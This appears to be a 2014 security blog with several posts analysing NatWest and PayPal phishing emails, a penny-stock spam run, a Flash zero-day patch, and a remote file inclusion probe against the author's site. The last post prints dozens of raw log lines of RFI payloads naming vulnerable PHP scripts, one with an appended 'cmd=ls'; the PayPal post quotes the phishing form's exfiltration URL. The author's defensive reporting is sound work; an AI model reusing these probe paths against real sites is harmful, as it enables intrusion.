Wiz's Computer and Website Security Blog

February 23, 2014

I intercepted an email phishing scam today, targeting The Royal Bank of Scotland customers. It uses the abbreviation NatWest, as the sender and in logos on the page. Nat West stands for National Westminster Bank.

Analysis

The sender (From) claims to be: "NatWest Credit Card"
The subject is: Dear (They insert your email address here) Credit Card Online Services
The body text begins with:

Notice

Dear (your email address)
Your access to NatWest Credit Card Online Services is locked out..

Because of that, our security team had to suspend your account.

Please use the link below to unlock.:

The link in the message I received was on a compromised website named: sullivankitchen.com. The fraudsters have created a new folder, or folders, on that website and are using a single index file under /administrator/mobile to forward victims to another file (start.php) on the same website, to the actual location of the phishing page.

The phishing page has logos and other images and links stolen from the NatWest Royal Bank Of Scotland website. They have obviously failed to apply hotlink protection to their images, some of which were embedded from https locations. Example: https://cardservices.natwest.com/RBSG_Consumer/images/NatWest_alert.png

NB: In the footer, at the bottom of the page, is an out-of-date copyright notice, as follows: © 2005-2009 National Westminster Bank plc. This should raise your antennas, as it is now 2014!

The landing page with all the stolen logos and links has a form field requesting the victim's username, followed by two dead links if you have forgotten your username or password. Below that is a Login button. This button is also stolen (hotlinked) from the natwest.com website! Inputting any name into the username field, then clicking the Login button takes you to a file named: nw-logon.php, where you are asked to input your banking credentials, as follows:
Internet PIN (4 digits)*
Internet Password*
Email Address*
Email Password*

If you do this, then click on the button labeled Next, your banking username and password, along with your email address and password are sent to the cybercriminals behind this banking fraud. You are then forwarded to the actual NatWest bank website, to fool you into thinking nothing bad has happened. However, it doesn't take a genius to notice the pink-purple box on the upper right, asking you to log in. This is the it's-too-late giveaway that your account login has been successfully stolen, via a phishing scam.

With your NatWest credentials they can empty your bank account in minutes, plus take control of the email address you provided and use it to send spam and scam messages to your contacts list, if any exists.

I don't know who is behind this phishing scam. But, I have traced an interesting IP address almost hidden among the various headers. It is a Ukrainian mail server (mail.paton.kiev.ua), at 91.212.177.7, listed as belonging to: AS49306 ONGOZA Ltd., Ukraine, Kyiv, Yaroslaviv Val, 36-38. Their CIDR is 91.212.177.0/24, which I am adding to my Russian Blocklist.

Posted by Wiz at 1:47 PM | Permalink

back to top ^

February 20, 2014

I was wondering when they'd make a comeback? Well, they're here! I'm referring to the good old pump and dump penny stock scams, promoted by fraudsters, via spam email messages.

The last time I saw any of these email scams was briefly in December, 2013. Before that the last serious scam run for penny stocks petered out at the end of the summer, 2013. Each one of those pump and dump scams listed a 4 letter stock symbol with a very low valuation, along with grandiose subjects and body text proclaiming that it was about to explode, or was releasing huge news, etc. Recipients were urged to buy in quickly, in huge quantities, which drove the prices up. As soon as those artificial prices peaked, the fraudsters running the scam sold off all of their shares at a profit, leaving all of the later investors holding the bag.

After disappearing for a few months, the penny stock scam has just returned, today, February 20, 2014. This time around, the stock being pumped up is PRFC. The emails are all using the exact same language and template. All have the subject: Very important information. Please read, although this is likely to change by tomorrow. All are sent from botnetted computers. The goal is the same as before. Scammers have purchase huge blocks of super-cheap penny stocks for PRFC and are now using spam messages to pump them higher. If they succeed, it will be at the expense of the people who are fooled by their new newsletter and plain language format.

However, I did find some humor in this batch of scams. Every one of them so far has been signed at the bottom with this text: "Your favorite friend and only broker :)" But apparently, my favorite friend and only broker has multiple personality disorder and is confused as to who he or she is with any given email. Each email has a different name in the From field! So far, my "only broker" claims to be: Noemi Cooke, Markus Robertson, Jasmine Suarez, Arlene Adkins and Leandro Kinney!

I've said it before and will say it again: "A fool and his money soon will part!" Don't be a fool. Never buy anything spamvertised, especially penny stocks. The game is stacked against you by true con men and women. You will not beat them at their own game. Delete pump and dump messages on sight.

BTW: I have updated my MailWasher Pro spam filters to detect and delete these messages for you, if you are also a registered MailWasher Pro user.

Posted by Wiz at 10:23 PM | Permalink

back to top ^

February 20, 2014

Today, Adobe released an unscheduled updated version of its Flash Player; the one that nearly every computer and hand held device except Apple iPhones and iPads use to view videos and animations online. The new releases are version 12,0,0,70 for all Windows and Mac OS X operating systems, version 11.2.202.341 for Linux, and 11.2.202.223 for Solaris.

Adobe strongly recommends that users of Adobe Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh should update to Adobe Flash Player 12.0.0.70 and folks using 11.2.202.336 and earlier versions for Linux should update to Adobe Flash Player 11.2.202.341.

You can find out what, if any, version of Flash your various browsers are running on the Adobe About Flash page. It contains a link to download the newest version of Flash for you browser and any others you may have installed. Firefox, Internet Explorer and Google Chrome all use different builds of Flash. You update Flash plug-in for Firefox, an ActiveX version for Internet Explorer and Google Chrome itself is updated to include new builds of Flash.

Adobe normally releases updated versions of Flash on a monthly cycle, on the second Tuesday of every month, soon after Microsoft pushes out its Patch Tuesday Windows Updates. However, as fate would have it, the Flash exploit patched today is directly linked to Microsoft's Internet Explorer browsers, but currently, only IE 9 and 10 and only on particular versions of Windows, from Vista up.

So, Microsoft joined with Adobe to plug their interconnected "zero day" vulnerability being exploited in online attacks against specifically targeted entities. While Microsoft hasn't pushed out an out-of-cycle patch yet, they have published a "Microsoft Fix it 51007 as a so-called "MSHTML Shim Workaround." Security Advisory 2934088 lists all of the impacted operating systems and IE browsers.

There is a negative impact after installing the Fix it solution above. According to the Microsoft Security Advisory 2934088, "after you install this Fix it solution, you may experience increased memory usage when you use Internet Explorer to browse the web. This behavior occurs until you restart Internet Explorer."

In the event that the affect of the Fix it tool is worse than your perceived risk, you can run Microsoft Fix it 51008 to undo the changes. They really should call these secondary tools "Undo" tools.

Rest assured that Microsoft is working up an official patch that will probably be ready come the next Patch Tuesday, in March, 2014.

N.B.: As I have mentioned before in many of my articles, running your computer as a less privileged user, rather than an administrator, greatly reduces the likelihood or at least the severity of infection from a "drive-by" exploit attack. This is in line with Microsoft's own advice, as found on the security advisory page:

An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Posted by Wiz at 6:57 PM | Permalink

back to top ^

February 20, 2014

Today, I received a suspicious email claiming to come from PayPal, with the subject: "Account Notification" - notifying me that I had to verify my account information - because of a "planned system upgrade." As I suspected, it was a Phishing scam, not only meant to steal one's PayPal credentials, but also your identity.

Here are the most important identifying features of this email scam.

PayPal Phishing Scam Email Contents

Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):

PayPal Account System Upgrade Verification.

Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.

 This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.

 Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.

 We apologize for any inconvenience, and thank you for your time.

Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.

Copyright © 1999-2014 PayPal. All rights reserved.

My analysis follows.

The first thing an astute PayPal customer should look for in any email communication from the company, is a "salutation" containing their own legal name, or whatever name they used to register their PayPal account (Dear _, Attention _, etc.). This email has no salutation whatsoever!

The next giveaway is the email address in the From field. Although the word "PayPal" is displayed, the actual email address next to it is not even spoofed to read @paypal.com. Rather, the scammers have borrowed an innocent third party email account and inserted it into both the Return path and From fields. This causes bounces and angry replies to go to the person or company whose account was spoofed. We call this a "Joe Job" in spam-fighter-speak.

Those of you who know how to display the incoming headers of email messages would have noticed that the sender was a Comcast customer in Westchester, Pa, who relayed it from a mail server in Brazil. To wit:
"Received: from imta24.westchester.pa.mail.comcast.net (LHLO imta24.westchester.pa.mail.comcast.net)"
"Received: from mail.xx11.com.br ([177.8.168.7])"

The next suspicious item is this sentence: "We have sent you an attachment form through this email. Please download and open it in your web browser." PayPal doesn't do that. If you must fill out a form or update any information, they tell you to log into your PayPal account and go to this or that section and download or update it from the official PayPal website.

Now, about that attached form...

The attached file is a full-fledged html document, complete with images stolen from various PayPal servers. When opened in a browser it closely resembles an official PayPal page. Along the top is a section of button-like links, starting with "My Account," all of which do nothing if clicked. There are however a few scattered actual links to various PayPal pages, just to throw you off balance.

The call to action in this fraud begins under the bold heading: "Profile Update" - where we find this threatening sentence: "Please complete the form below to update your Profile information and restore your account access." This is meant to get recipients to begin filling in the requested (and "required" details that follow, for fear of losing access to their PayPal accounts.

So, what information do they want you to update? Look no farther than the input fields under: "Personal Information Profile" Here we find everything needed for identity theft.

Card Holder Name:
Date of Birth:
Mother's Maiden Name:
Social Security Number:
Home Phone Number:

Address Line 1:
Address Line 2:
City:
State:
Zip Code:
Country:

Card Number:
Expiration Date:
Card Verification Number:

At the bottom right of the form is a gold colored button, labeled: "Save Profile." That is the "submit" button that sends all of your personally identifiable information, along with your PayPal credit/debit card details and CVE code, to a domain registered in The Soviet Union. (form name="frm" action="h**p://www.informed.su/Verified.php")

I'll bet you thought that the Soviet Union was long gone. As a political entity, yes. As a legal web domain name, no. Read this:

What is .su?
.su was assigned as the country code top-level domain for the Soviet Union on September 19, 1990. It remains in use today, even though the Soviet Union itself no longer exists, and is administered by the Russian Institute for Public Networks (RIPN, or RosNIIROS in Russian transcription).
(snip)
In Soviet Union the official language is Russian.

As I finished this article, I discovered that the domain "informed.su" has been deactivated, following SpamCop reports from me and other spam fighters (You tried to visit informed.su, which is not loading.).

I pray that none of my readers fell victim to this phishing scam. If you have, please log into your PayPal account and change the password and request a new credit/debit card. You might also want to start monitoring your credit reports for attempts to open new accounts from abroad.

Posted by Wiz at 1:37 PM | Permalink

back to top ^

February 16, 2014

As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and from where they were referred, but who was attacking my web site and what probes they were using.

On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to an Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.

Upon checking out Towntek.com I was greeted by a "default website page" that is displayed when web space has been leased, but no content has been uploaded to the public web root, and/ or no index page has been published.

So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.

Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.

I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.

Excerpts of the attack are shown in my extended content.

Excerpts of the server attack targeting Wizcrafts.net, on 2/16/2014:

---

208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /=http://www.google.com/humans.txt? HTTP/1.1" 403 329 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?_CONFIG[files][functions_page]=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?show=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
snip

208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /work/index.php?g_include=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-cache-phase1.php?plugin=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wsk/wsk.php?wsk=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /xarg_corner.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_top.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?&2093085906=1&995617320=2 HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xt_counter.php?server_base_dir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yacs/scripts/update_trailer.php?context[path_to_root]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yrch/plugins/metasearch/plug.inc.php?path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zipndownload.php?PP_PATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"

---

The attack lasted over 12 minutes and encompassed 2189 individual lines in my access log. The targets were probed in alphabetical order, ending with items beginning with the letter Z. Every one was tested to see if it could be used to include the remote file named "humans.txt." This type of attack is called an RFI attack.

If you own or manage web sites, check your access logs for similar entries. Mine all gave either a 403, 405, or 406 server response, which means they were fended off. If you see such hack attempts and any show a server 200 response, that means that the remote file inclusion was successful a you web server or web site may have been hacked.

Posted by Wiz at 4:45 PM | Permalink

back to top ^